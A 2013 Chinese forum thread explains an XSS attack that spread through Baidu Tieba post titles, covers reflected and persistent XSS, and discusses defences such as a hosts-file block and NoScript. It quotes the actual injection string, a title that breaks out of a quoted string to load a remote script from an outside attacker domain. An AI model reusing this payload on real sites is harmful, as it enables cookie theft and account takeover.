由百度爆XSS漏洞介绍——跨站脚本攻击(XSS攻击)

哀酱俏佳人

结构：
文件类型 <HTML></HTML> （放在档案的开头与结尾）
文件主题 <TITLE></TITLE> （必须放在「文头」区块内）
文头 <HEAD></HEAD> （描述性资料，像是「主题」）
文体 <BODY></BODY> （文件本体）



大量贴吧出现这些帖子，其实这是一种XSS攻击

<a href="/p/2337360852" title="点进来有..&quot;,a:$.getScript('//xss.retaker.me/1.js'),a:&quot;" target="_blank" class="j_th_tit">点进来有..",a:$.getScript('//xss.retaker.me/1.js'),a:"</a>

1. <html>
   
2. <head>
   
3. 
   
4. <meta charset="gbk">
   
5. <meta furl="tieba.baidu.com/f?kw=%C2%DE%B6%A8%B5%DA%D2%BB%D6%D0%D1%A7" fname="罗定第一中学">
   
6. <title>点进来有..&quot;,a:$.getScript('//xss.retaker.me/1.js'),a:&quot;_罗定第一中学吧_百度贴吧</title>
   
7. 
   
8. <link rel="apple-touch-icon" href="http://tb2.bdstatic.com/tb/wap/img/touch.png" />
   

复制代码

标题中的//xss.retaker.me/1.js就是要执行的脚本

这个能在远程HTTP服务器上前台运行脚本（如JavaScript等）并将documents.cookie记录在其他服务器后台上，利用XSS漏洞执行的攻击方法就叫作XSS攻击，由于只是中级漏洞，只能访问特定地址才能执行，所以会陷入到html当中引诱用户点击执行代码。

附上XSS攻击的网络解释

XSS攻击：跨站脚本攻击（Cross Site Scripting），为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它 用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略（same origin policy）。这种类型的漏洞由于被骇客用来编写危害性更大的phishing攻击而变得广为人知。对于跨站脚本攻击，黑客界共识是：跨站脚本攻击是新 型的“缓冲区溢出攻击“，而JavaScript是新型的“ShellCode”。

百度身为中国最大的搜索引擎和网络运营商，这种中等级别的漏洞也会被黑客利用，可想而知中国网络的状况了。

在百度还没修补漏洞前，最简单的解决办法就是

C:\Windows\System32\drivers\etc\hosts用记事本打开，添加127.0.0.1 xss.retaker.me保存后再打开网页就不会执行该XSS漏洞js了

目前百度这种贴吧被爆的XSS攻击应该是属于Reflected cross-site scripting类型的，即非持久化的XSS攻击，是我们通常所说的，也是最常用，使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL，当URL地址被打开时，特有的恶意代码参数被HTML解析、执行。它的特点是非持久化，必须用户点击带有特定参数的链接菜能引起。


如果是Persistent cross-site scripting，即持久化XSS攻击，指的是恶意脚本代码被存储进被攻击的数据库，当其他用户正常浏览网页时，站点从数据库中读取了非法用户存入非法数据，恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。这种类型有可能会在论坛中出现，所以用户发现点击某个页面后跳转到一个陌生的页面，就要注意了，很可能就是这类的Persistent cross-site scripting攻击。


XSS漏洞攻击就是由于web页面编写不完善引起的，XSS攻击的危害包括

1、盗取各类用户帐号，如机器登录帐号、用户网银帐号、各类管理员帐号

2、控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力

3、盗窃企业重要的具有商业价值的资料

4、非法转账

5、强制发送电子邮件

6、网站挂马

7、控制受害者机器向其它网站发起攻击


就这些就能和SQL注入漏洞相提并论了，拥有XSS漏洞的网站能被别有用心的人利用，不知不觉中被盗取信息。

蓝核

推荐对付方法

包括但不限于

1不点可疑网址

2火狐的noscript插件，chrome的类似相关插件

3多多关心乌云……我要不要发布2个珍藏给我们内部

哀酱俏佳人

蓝核 发表于 2013-5-19 19:29
推荐对付方法

包括但不限于

你喜欢，我直接访问的，反正没登录，只发帖不盗号

蓝核

哀酱俏佳人 发表于 2013-5-19 19:32
你喜欢，我直接访问的，反正没登录，只发帖不盗号

我都是登陆的……上次noscript还帮我拦截一个ABE攻击……就是网马区……

哀酱俏佳人

蓝核 发表于 2013-5-19 19:36
我都是登陆的……上次noscript还帮我拦截一个ABE攻击……就是网马区……

好吧，我也用一下

蓝核

哀酱俏佳人 发表于 2013-5-19 19:59
好吧，我也用一下

安装后默认……千万别一开始就直接全局拦截脚本……

哀酱俏佳人

蓝核 发表于 2013-5-19 20:00
安装后默认……千万别一开始就直接全局拦截脚本……

这样网页就没脚本了

蓝核

哀酱俏佳人 发表于 2013-5-19 20:02
这样网页就没脚本了

然后速度超快哦~~~~~~~~无比安全哦~~~~~~~~~~

哀酱俏佳人

蓝核 发表于 2013-5-19 20:04
然后速度超快哦~~~~~~~~无比安全哦~~~~~~~~~~

NoScript also provides the most powerful anti-XSS and anti-Clickjacking protection ever available in a browser.

看来挺好用

哀酱俏佳人

蓝核 发表于 2013-5-19 20:04
然后速度超快哦~~~~~~~~无比安全哦~~~~~~~~~~

只支持firefox吗